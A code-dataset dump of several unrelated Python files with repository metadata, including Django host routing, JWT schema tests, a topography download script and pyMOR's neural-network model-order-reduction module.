save_image(rgb_img_uienet, "/home/martin/Data/Images/Image-Color-UIENet.png")
save_image(img, "/home/martin/Data/Images/Image-Gray.png", "gray")
save_image(img_blf, "/home/martin/Data/Images/Image-Gray-BLF.png", "gray")
save_image(img_he, "/home/martin/Data/Images/Image-Gray-HE-BLF.png", "gray")
save_image(img_clahe, "/home/martin/Data/Images/Image-Gray-CLAHE-BLF.png", "gray")
save_image(img_uienet, "/home/martin/Data/Images/Image-Gray-UIENet.png", "gray")
save_image(ssi_blf, "/home/martin/Data/Images/Image-SSI-BLF.png", "gray")
save_image(ssi_he, "/home/martin/Data/Images/Image-SSI-HE-BLF.png", "gray")
save_image(ssi_clahe, "/home/martin/Data/Images/Image-SSI-CLAHE-BLF.png", "gray")
save_image(ssi_uienet, "/home/martin/Data/Images/Image-SSI-UIENet.png", "gray")
if __name__ == "__main__":
main()
| true
| true
|
1c3ea740f67d1f5b875602483a82cf37dd383da5
| 201
|
py
|
Python
|
app/hosts.py
|
noahbarnette/ugahacks5
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 5
|
2020-07-22T19:18:09.000Z
|
2021-02-05T21:30:42.000Z
|
app/hosts.py
|
noahbarnette/ugahacks5
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 9
|
2021-01-27T21:42:51.000Z
|
2022-03-12T00:20:25.000Z
|
app/hosts.py
|
ugahacks/myugahacks
|
72059709cf4e6d25bd2dc2e880f3c3590d583115
|
[
"MIT"
] | 1
|
2020-02-04T23:49:12.000Z
|
2020-02-04T23:49:12.000Z
|
from django.conf import settings
from django_hosts import patterns, host
host_patterns = patterns('',
host(r'my', settings.ROOT_URLCONF, name='my'),
host(r'blog', 'blog.urls', name='blog'),
)
| 25.125
| 50
| 0.701493
|
from django.conf import settings
from django_hosts import patterns, host
host_patterns = patterns('',
host(r'my', settings.ROOT_URLCONF, name='my'),
host(r'blog', 'blog.urls', name='blog'),
)
| true
| true
|
1c3ea864d959188af0794e432f2e8ea8da76a496
| 2,763
|
py
|
Python
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 1,025
|
2020-03-03T19:29:49.000Z
|
2022-03-30T03:23:30.000Z
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 677
|
2020-03-06T15:17:31.000Z
|
2022-03-31T20:59:12.000Z
|
tests/contrib/test_simplejwt.py
|
bahag-raesenerm/drf-spectacular
|
fb4c8410357b8a987991888d026167496165e95a
|
[
"BSD-3-Clause"
] | 145
|
2020-03-10T09:45:44.000Z
|
2022-03-26T19:38:43.000Z
|
from unittest import mock
import pytest
from django.urls import path
from rest_framework import mixins, routers, serializers, viewsets
from tests import assert_schema, generate_schema
try:
from rest_framework_simplejwt.authentication import (
JWTAuthentication, JWTTokenUserAuthentication,
)
from rest_framework_simplejwt.views import (
TokenObtainPairView, TokenObtainSlidingView, TokenRefreshView, TokenVerifyView,
)
except ImportError:
JWTAuthentication = None
class XSerializer(serializers.Serializer):
uuid = serializers.UUIDField()
class XViewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTAuthentication]
required_scopes = ['x:read', 'x:write']
class X2Viewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTTokenUserAuthentication]
required_scopes = ['x:read', 'x:write']
@pytest.mark.contrib('rest_framework_simplejwt')
@pytest.mark.parametrize('view', [XViewset, X2Viewset])
def test_simplejwt(no_warnings, view):
router = routers.SimpleRouter()
router.register('x', view, basename="x")
urlpatterns = [
*router.urls,
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token-sliding/', TokenObtainSlidingView.as_view(), name='token_obtain_sliding'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('token/verify/', TokenVerifyView.as_view(), name='token_verify'),
]
schema = generate_schema(None, patterns=urlpatterns)
assert_schema(schema, 'tests/contrib/test_simplejwt.yml')
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch('rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_TYPES', ('JWT',))
def test_simplejwt_non_bearer_keyword(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'Authorization',
'description': 'Token-based authentication with required prefix "JWT"'
}
}
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch(
'rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_NAME',
'HTTP_X_TOKEN',
create=True,
)
def test_simplejwt_non_std_header_name(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'X-token',
'description': 'Token-based authentication with required prefix "Bearer"'
}
}
| 32.892857
| 94
| 0.704669
|
from unittest import mock
import pytest
from django.urls import path
from rest_framework import mixins, routers, serializers, viewsets
from tests import assert_schema, generate_schema
try:
from rest_framework_simplejwt.authentication import (
JWTAuthentication, JWTTokenUserAuthentication,
)
from rest_framework_simplejwt.views import (
TokenObtainPairView, TokenObtainSlidingView, TokenRefreshView, TokenVerifyView,
)
except ImportError:
JWTAuthentication = None
class XSerializer(serializers.Serializer):
uuid = serializers.UUIDField()
class XViewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTAuthentication]
required_scopes = ['x:read', 'x:write']
class X2Viewset(mixins.ListModelMixin, viewsets.GenericViewSet):
serializer_class = XSerializer
authentication_classes = [JWTTokenUserAuthentication]
required_scopes = ['x:read', 'x:write']
@pytest.mark.contrib('rest_framework_simplejwt')
@pytest.mark.parametrize('view', [XViewset, X2Viewset])
def test_simplejwt(no_warnings, view):
router = routers.SimpleRouter()
router.register('x', view, basename="x")
urlpatterns = [
*router.urls,
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token-sliding/', TokenObtainSlidingView.as_view(), name='token_obtain_sliding'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('token/verify/', TokenVerifyView.as_view(), name='token_verify'),
]
schema = generate_schema(None, patterns=urlpatterns)
assert_schema(schema, 'tests/contrib/test_simplejwt.yml')
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch('rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_TYPES', ('JWT',))
def test_simplejwt_non_bearer_keyword(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'Authorization',
'description': 'Token-based authentication with required prefix "JWT"'
}
}
@pytest.mark.contrib('rest_framework_simplejwt')
@mock.patch(
'rest_framework_simplejwt.settings.api_settings.AUTH_HEADER_NAME',
'HTTP_X_TOKEN',
create=True,
)
def test_simplejwt_non_std_header_name(no_warnings):
schema = generate_schema('/x', XViewset)
assert schema['components']['securitySchemes'] == {
'jwtAuth': {
'type': 'apiKey',
'in': 'header',
'name': 'X-token',
'description': 'Token-based authentication with required prefix "Bearer"'
}
}
| true
| true
|
1c3ea900c51ab6a9bddf42c028ecb093a76dbfce
| 188
|
py
|
Python
|
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
Estudos/110exercicios/Exercicios/ex011.py
|
romuloferraz/Python
|
2e20e7483cf9ea74b0b514f253034002bb56807f
|
[
"MIT"
] | null | null | null |
h = float(input('digite a altura(m) da sua parede:\n'))
c = float(input('Digite o comprimento(m) da sua parede:\n'))
print(f'Sua parede tem área = {c*h}m² e consumirá {c*h/2}L de tinta!')
| 47
| 70
| 0.670213
|
h = float(input('digite a altura(m) da sua parede:\n'))
c = float(input('Digite o comprimento(m) da sua parede:\n'))
print(f'Sua parede tem área = {c*h}m² e consumirá {c*h/2}L de tinta!')
| true
| true
|
1c3ea98a7585fb03beb4e762dac750a21ae4a86a
| 119
|
py
|
Python
|
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
projects/thesis/continuous/custom/continuous/deform_feature/__init__.py
|
cpark90/rrrcnn
|
ba66cc391265be76fa3896b66459ff7241b47972
|
[
"Apache-2.0"
] | null | null | null |
from .deform_feature_map_layer import *
from .deform_orienation_layer import *
from .deformable_by_grad_layer import *
| 29.75
| 39
| 0.848739
|
from .deform_feature_map_layer import *
from .deform_orienation_layer import *
from .deformable_by_grad_layer import *
| true
| true
|
1c3ea9de3eb93f5c90083da7512d23246cd1b525
| 171
|
py
|
Python
|
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
tests/project_awesome/b_module.py
|
ldiary/importlazy
|
0af9ee818428f6e9e79fb9391b05063e66a00ecd
|
[
"MIT"
] | null | null | null |
class BModuleClassOne:
class1_attribute = "Attribute of Class One in module B."
class BModuleClassTwo:
class2_attribute = "Attribute of Class Two in module B."
| 21.375
| 60
| 0.748538
|
class BModuleClassOne:
class1_attribute = "Attribute of Class One in module B."
class BModuleClassTwo:
class2_attribute = "Attribute of Class Two in module B."
| true
| true
|
1c3eaa7ea6c3c365dda9d17a0d39853324bddd4f
| 1,030
|
py
|
Python
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 2
|
2021-04-01T13:24:49.000Z
|
2021-09-15T17:24:19.000Z
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 20
|
2020-07-28T11:10:36.000Z
|
2021-08-19T13:10:44.000Z
|
tests/test_otscraper.py
|
LSDtopotools/lsdviztools
|
b6012c0013bea7a0af5e7fa283a8a2268be18e25
|
[
"MIT"
] | 2
|
2021-04-21T17:40:14.000Z
|
2021-09-15T17:24:20.000Z
|
#!/usr/bin/env python
'''
A script for testing the ot_scraper object
Simon Mudd
06/07/2020
'''
import lsdviztools.lsdbasemaptools as bmt
from lsdviztools.lsdplottingtools import lsdmap_gdalio as gio
import lsdviztools.lsdplottingtools as lsdplt
import rasterio as rio
import numpy as np
import lsdviztools.lsdmapwrappers as lsdmw
def test_01():
this_DEM = bmt.ot_scraper()
this_DEM.print_parameters()
this_DEM.download_pythonic()
this_DEM.to_UTM_pythonic()
def test_02():
RasterFile = "CP_SRTM30_UTM.tif"
DataDirectory = "./"
gio.convert2bil(DataDirectory, RasterFile,minimum_elevation=0.1)
gio.write_hillshade_bil(DataDirectory, RasterFile)
def test_03():
SB_DEM = bmt.ot_scraper(source = "SRTM30",longitude_W = -120.464655, longitude_E = -120.254214, latitude_S = 34.440538, latitude_N = 34.610770,prefix = "CP")
SB_DEM.print_parameters()
SB_DEM.download_pythonic()
SB_DEM.to_UTM_pythonic()
if __name__ == "__main__":
test_03()
test_02()
#run_tests_2()
| 21.914894
| 161
| 0.737864
|
import lsdviztools.lsdbasemaptools as bmt
from lsdviztools.lsdplottingtools import lsdmap_gdalio as gio
import lsdviztools.lsdplottingtools as lsdplt
import rasterio as rio
import numpy as np
import lsdviztools.lsdmapwrappers as lsdmw
def test_01():
this_DEM = bmt.ot_scraper()
this_DEM.print_parameters()
this_DEM.download_pythonic()
this_DEM.to_UTM_pythonic()
def test_02():
RasterFile = "CP_SRTM30_UTM.tif"
DataDirectory = "./"
gio.convert2bil(DataDirectory, RasterFile,minimum_elevation=0.1)
gio.write_hillshade_bil(DataDirectory, RasterFile)
def test_03():
SB_DEM = bmt.ot_scraper(source = "SRTM30",longitude_W = -120.464655, longitude_E = -120.254214, latitude_S = 34.440538, latitude_N = 34.610770,prefix = "CP")
SB_DEM.print_parameters()
SB_DEM.download_pythonic()
SB_DEM.to_UTM_pythonic()
if __name__ == "__main__":
test_03()
test_02()
| true
| true
|
1c3eaac3076c50b3e4bc856465dc5a85d4547c31
| 49,441
|
py
|
Python
|
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | null | null | null |
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | 14
|
2022-01-05T09:25:11.000Z
|
2022-03-31T17:07:10.000Z
|
src/pymor/reductors/neural_network.py
|
ullmannsven/pymor
|
407103ec50efa45d933f0c973314a4d511cae792
|
[
"Unlicense"
] | null | null | null |
# This file is part of the pyMOR project (https://www.pymor.org).
# Copyright pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (https://opensource.org/licenses/BSD-2-Clause)
from pymor.core.config import config
config.require('TORCH')
from numbers import Number
import inspect
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils as utils
from pymor.algorithms.pod import pod
from pymor.algorithms.projection import project
from pymor.core.base import BasicObject
from pymor.core.exceptions import NeuralNetworkTrainingFailed
from pymor.core.logger import getLogger
from pymor.models.neural_network import (FullyConnectedNN, NeuralNetworkModel,
NeuralNetworkStatefreeOutputModel,
NeuralNetworkInstationaryModel,
NeuralNetworkInstationaryStatefreeOutputModel)
class NeuralNetworkReductor(BasicObject):
"""Reduced Basis reductor relying on artificial neural networks.
This is a reductor that constructs a reduced basis using proper
orthogonal decomposition and trains a neural network that approximates
the mapping from parameter space to coefficients of the full-order
solution in the reduced basis.
The approach is described in :cite:`HU18`.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
basis_size
Desired size of the reduced basis. If `None`, rtol, atol or l2_err must
be provided.
rtol
Relative tolerance the basis should guarantee on the training set.
atol
Absolute tolerance the basis should guarantee on the training set.
l2_err
L2-approximation error the basis should not exceed on the training
set.
pod_params
Dict of additional parameters for the POD-method.
ann_mse
If `'like_basis'`, the mean squared error of the neural network on
the training set should not exceed the error of projecting onto the basis.
If `None`, the neural network with smallest validation error is
used to build the ROM.
If a tolerance is prescribed, the mean squared error of the neural
network on the training set should not exceed this threshold.
Training is interrupted if a neural network that undercuts the
error tolerance is found.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def reduce(self, hidden_layers='[(N+P)*3, (N+P)*3]', activation_function=torch.tanh,
optimizer=optim.LBFGS, epochs=1000, batch_size=20, learning_rate=1.,
loss_function=None, restarts=10, lr_scheduler=optim.lr_scheduler.StepLR,
lr_scheduler_params={'step_size': 10, 'gamma': 0.7},
es_scheduler_params={'patience': 10, 'delta': 0.}, weight_decay=0.,
log_loss_frequency=0, seed=0):
"""Reduce by training artificial neural networks.
Parameters
----------
hidden_layers
Number of neurons in the hidden layers. Can either be fixed or
a Python expression string depending on the reduced basis size
respectively output dimension `N` and the total dimension of
the |Parameters| `P`.
activation_function
Activation function to use between the hidden layers.
optimizer
Algorithm to use as optimizer during training.
epochs
Maximum number of epochs for training.
batch_size
Batch size to use if optimizer allows mini-batching.
learning_rate
Step size to use in each optimization step.
loss_function
Loss function to use for training. If `'weighted MSE'`, a weighted
mean squared error is used as loss function, where the weights are
given as the singular values of the corresponding reduced basis
functions. If `None`, the usual mean squared error is used.
restarts
Number of restarts of the training algorithm. Since the training
results highly depend on the initial starting point, i.e. the
initial weights and biases, it is advisable to train multiple
neural networks by starting with different initial values and
choose that one performing best on the validation set.
lr_scheduler
Algorithm to use as learning rate scheduler during training.
If `None`, no learning rate scheduler is used.
lr_scheduler_params
A dictionary of additional parameters passed to the init method of
the learning rate scheduler. The possible parameters depend on the
chosen learning rate scheduler.
es_scheduler_params
A dictionary of additional parameters passed to the init method of
the early stopping scheduler. For the possible parameters,
see :class:`EarlyStoppingScheduler`.
weight_decay
Weighting parameter for the l2-regularization of the weights and
biases in the neural network. This regularization is not available
for all optimizers; see the PyTorch documentation for more details.
log_loss_frequency
Frequency of epochs in which to log the current validation and
training loss during training of the neural networks.
If `0`, no intermediate logging of losses is done.
seed
Seed to use for various functions in PyTorch. Using a fixed seed,
it is possible to reproduce former results.
Returns
-------
rom
Reduced-order |NeuralNetworkModel|.
"""
assert restarts > 0
assert epochs > 0
assert batch_size > 0
assert learning_rate > 0.
assert weight_decay >= 0.
# set a seed for the PyTorch initialization of weights and biases
# and further PyTorch methods
torch.manual_seed(seed)
# build a reduced basis using POD and compute training data
if not hasattr(self, 'training_data'):
self.compute_training_data()
layer_sizes = self._compute_layer_sizes(hidden_layers)
# compute validation data
if not hasattr(self, 'validation_data'):
with self.logger.block('Computing validation snapshots ...'):
if self.validation_set:
self.validation_data = []
for mu in self.validation_set:
sample = self._compute_sample(mu)
self.validation_data.extend(sample)
else:
number_validation_snapshots = int(len(self.training_data)*self.validation_ratio)
# randomly shuffle training data before splitting into two sets
np.random.shuffle(self.training_data)
# split training data into validation and training set
self.validation_data = self.training_data[0:number_validation_snapshots]
self.training_data = self.training_data[number_validation_snapshots+1:]
# run the actual training of the neural network
with self.logger.block('Training of neural network ...'):
target_loss = self._compute_target_loss()
# set parameters for neural network and training
neural_network_parameters = {'layer_sizes': layer_sizes,
'activation_function': activation_function}
if loss_function == 'weighted MSE':
if hasattr(self, 'weights'):
weights = self.weights
def weighted_mse_loss_function(inputs, targets):
return (weights * (inputs - targets) ** 2).mean()
loss_function = weighted_mse_loss_function
self.logger.info('Using weighted MSE loss function ...')
else:
raise RuntimeError('No weights for weighted MSE loss available!')
training_parameters = {'optimizer': optimizer, 'epochs': epochs,
'batch_size': batch_size, 'learning_rate': learning_rate,
'lr_scheduler': lr_scheduler, 'lr_scheduler_params': lr_scheduler_params,
'es_scheduler_params': es_scheduler_params, 'weight_decay': weight_decay,
'loss_function': loss_function}
self.logger.info('Initializing neural network ...')
# initialize the neural network
neural_network = FullyConnectedNN(**neural_network_parameters).double()
# run training algorithm with multiple restarts
self.neural_network, self.losses = multiple_restarts_training(self.training_data, self.validation_data,
neural_network, target_loss, restarts,
log_loss_frequency, training_parameters,
self.scaling_parameters, seed)
self._check_tolerances()
return self._build_rom()
def compute_training_data(self):
"""Compute a reduced basis using proper orthogonal decomposition."""
# compute snapshots for POD and training of neural networks
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
U.append(self.fom.solve(mu))
# compute reduced basis via POD
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
# compute training samples
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu, u in zip(self.training_set, U):
sample = self._compute_sample(mu, u)
# compute minimum and maximum of outputs/targets for scaling
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
# set singular values as weights for the weighted MSE loss
self.weights = torch.Tensor(svals)
# compute mean square loss
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _update_scaling_parameters(self, sample):
assert len(sample) == 2 or (len(sample) == 1 and len(sample[0]) == 2)
if len(sample) == 1:
sample = sample[0]
def prepare_datum(datum):
if not (isinstance(datum, torch.DoubleTensor) or isinstance(datum, np.ndarray)):
return datum.to_numpy()
return datum
sample = (torch.DoubleTensor(prepare_datum(sample[0])), torch.DoubleTensor(prepare_datum(sample[1])))
if self.scale_inputs:
if self.scaling_parameters['min_inputs'] is not None:
self.scaling_parameters['min_inputs'] = torch.min(self.scaling_parameters['min_inputs'], sample[0])
else:
self.scaling_parameters['min_inputs'] = sample[0]
if self.scaling_parameters['max_inputs'] is not None:
self.scaling_parameters['max_inputs'] = torch.max(self.scaling_parameters['max_inputs'], sample[0])
else:
self.scaling_parameters['max_inputs'] = sample[0]
if self.scale_outputs:
if self.scaling_parameters['min_targets'] is not None:
self.scaling_parameters['min_targets'] = torch.min(self.scaling_parameters['min_targets'],
sample[1])
else:
self.scaling_parameters['min_targets'] = sample[1]
if self.scaling_parameters['max_targets'] is not None:
self.scaling_parameters['max_targets'] = torch.max(self.scaling_parameters['max_targets'],
sample[1])
else:
self.scaling_parameters['max_targets'] = sample[1]
def _compute_sample(self, mu, u=None):
"""Transform parameter and corresponding solution to |NumPy arrays|."""
# determine the coefficients of the full-order solutions in the reduced basis to obtain
# the training data
if u is None:
u = self.fom.solve(mu)
product = self.pod_params.get('product')
return [(mu, self.reduced_basis.inner(u, product=product)[:, 0])]
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the reduced basis size
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [len(self.reduced_basis), ]
def _compute_target_loss(self):
"""Compute target loss depending on value of `ann_mse`."""
target_loss = None
if isinstance(self.ann_mse, Number):
target_loss = self.ann_mse
elif self.ann_mse == 'like_basis':
target_loss = self.mse_basis
return target_loss
def _check_tolerances(self):
"""Check if trained neural network is sufficient to guarantee certain error bounds."""
with self.logger.block('Checking tolerances for error of neural network ...'):
if isinstance(self.ann_mse, Number):
if self.losses['full'] > self.ann_mse:
raise NeuralNetworkTrainingFailed('Could not train a neural network that '
'guarantees prescribed tolerance!')
elif self.ann_mse == 'like_basis':
if self.losses['full'] > self.mse_basis:
raise NeuralNetworkTrainingFailed('Could not train a neural network with an error as small as '
'the reduced basis error! Maybe you can try a different '
'neural network architecture or change the value of '
'`ann_mse`.')
elif self.ann_mse is None:
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
else:
raise ValueError('Unknown value for mean squared error of neural network')
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
def reconstruct(self, u):
"""Reconstruct high-dimensional vector from reduced vector `u`."""
assert hasattr(self, 'reduced_basis')
return self.reduced_basis.lincomb(u.to_numpy())
class NeuralNetworkStatefreeOutputReductor(NeuralNetworkReductor):
"""Output reductor relying on artificial neural networks.
This is a reductor that trains a neural network that approximates
the mapping from parameter space to output space.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
validation_loss
The validation loss to reach during training. If `None`, the neural
network with the smallest validation loss is returned.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
validation_loss=None, scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute the training samples (the outputs to the parameters of the training set)."""
with self.logger.block('Computing training samples ...'):
self.training_data = []
for mu in self.training_set:
sample = self._compute_sample(mu)
self._update_scaling_parameters(sample)
self.training_data.extend(sample)
def _compute_sample(self, mu):
"""Transform parameter and corresponding output to tensors."""
return [(mu, self.fom.output(mu).flatten())]
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network."""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': self.fom.dim_output, 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the output dimension
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim, ] + hidden_layers + [self.fom.dim_output, ]
def _compute_target_loss(self):
"""Compute target loss depending on value of `ann_mse`."""
return self.validation_loss
def _check_tolerances(self):
"""Check if trained neural network is sufficient to guarantee certain error bounds."""
self.logger.info('Using neural network with smallest validation error ...')
self.logger.info(f'Finished training with a validation loss of {self.losses["val"]} ...')
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
rom = NeuralNetworkStatefreeOutputModel(self.neural_network, parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
name=f'{self.fom.name}_output_reduced')
return rom
class NeuralNetworkInstationaryReductor(NeuralNetworkReductor):
"""Reduced Basis reductor for instationary problems relying on artificial neural networks.
This is a reductor that constructs a reduced basis using proper
orthogonal decomposition and trains a neural network that approximates
the mapping from parameter and time space to coefficients of the
full-order solution in the reduced basis.
The approach is described in :cite:`WHR19`.
Parameters
----------
fom
The full-order |Model| to reduce.
training_set
Set of |parameter values| to use for POD and training of the
neural network.
validation_set
Set of |parameter values| to use for validation in the training
of the neural network.
validation_ratio
Fraction of the training set to use for validation in the training
of the neural network (only used if no validation set is provided).
basis_size
Desired size of the reduced basis. If `None`, rtol, atol or l2_err must
be provided.
rtol
Relative tolerance the basis should guarantee on the training set.
atol
Absolute tolerance the basis should guarantee on the training set.
l2_err
L2-approximation error the basis should not exceed on the training
set.
pod_params
Dict of additional parameters for the POD-method.
ann_mse
If `'like_basis'`, the mean squared error of the neural network on
the training set should not exceed the error of projecting onto the basis.
If `None`, the neural network with smallest validation error is
used to build the ROM.
If a tolerance is prescribed, the mean squared error of the neural
network on the training set should not exceed this threshold.
Training is interrupted if a neural network that undercuts the
error tolerance is found.
scale_inputs
Determines whether or not to scale the inputs of the neural networks.
scale_outputs
Determines whether or not to scale the outputs/targets of the neural
networks.
"""
def __init__(self, fom, training_set, validation_set=None, validation_ratio=0.1,
basis_size=None, rtol=0., atol=0., l2_err=0., pod_params={},
ann_mse='like_basis', scale_inputs=True, scale_outputs=False):
assert 0 < validation_ratio < 1 or validation_set
self.scaling_parameters = {'min_inputs': None, 'max_inputs': None,
'min_targets': None, 'max_targets': None}
self.__auto_init(locals())
def compute_training_data(self):
"""Compute a reduced basis using proper orthogonal decomposition."""
# compute snapshots for POD and training of neural networks
with self.logger.block('Computing training snapshots ...'):
U = self.fom.solution_space.empty()
for mu in self.training_set:
u = self.fom.solve(mu)
if hasattr(self, 'nt'):
assert self.nt == len(u)
else:
self.nt = len(u)
U.append(u)
# compute reduced basis via POD
with self.logger.block('Building reduced basis ...'):
self.reduced_basis, svals = pod(U, modes=self.basis_size, rtol=self.rtol / 2.,
atol=self.atol / 2., l2_err=self.l2_err / 2.,
**(self.pod_params or {}))
# compute training samples
with self.logger.block('Computing training samples ...'):
self.training_data = []
for i, mu in enumerate(self.training_set):
samples = self._compute_sample(mu, U[i*self.nt:(i+1)*self.nt])
for sample in samples:
self._update_scaling_parameters(sample)
self.training_data.extend(samples)
# set singular values as weights for the weighted MSE loss
self.weights = torch.Tensor(svals)
# compute mean square loss
self.mse_basis = (sum(U.norm2()) - sum(svals**2)) / len(U)
def _compute_sample(self, mu, u=None):
"""Transform parameter and corresponding solution to |NumPy arrays|.
This function takes care of including the time instances in the inputs.
"""
if u is None:
u = self.fom.solve(mu)
parameters_with_time = [mu.with_(t=t) for t in np.linspace(0, self.fom.T, self.nt)]
product = self.pod_params.get('product')
samples = [(mu, self.reduced_basis.inner(u_t, product=product)[:, 0])
for mu, u_t in zip(parameters_with_time, u)]
return samples
def _compute_layer_sizes(self, hidden_layers):
"""Compute the number of neurons in the layers of the neural network
(make sure to increase the input dimension to account for the time).
"""
# determine the numbers of neurons in the hidden layers
if isinstance(hidden_layers, str):
hidden_layers = eval(hidden_layers, {'N': len(self.reduced_basis), 'P': self.fom.parameters.dim})
# input and output size of the neural network are prescribed by the
# dimension of the parameter space and the reduced basis size
assert isinstance(hidden_layers, list)
return [self.fom.parameters.dim + 1, ] + hidden_layers + [len(self.reduced_basis), ]
def _build_rom(self):
"""Construct the reduced order model."""
with self.logger.block('Building ROM ...'):
projected_output_functional = project(self.fom.output_functional, None, self.reduced_basis)
rom = NeuralNetworkInstationaryModel(self.fom.T, self.nt, self.neural_network,
parameters=self.fom.parameters,
scaling_parameters=self.scaling_parameters,
output_functional=projected_output_functional,
name=f'{self.fom.name}_reduced')
return rom
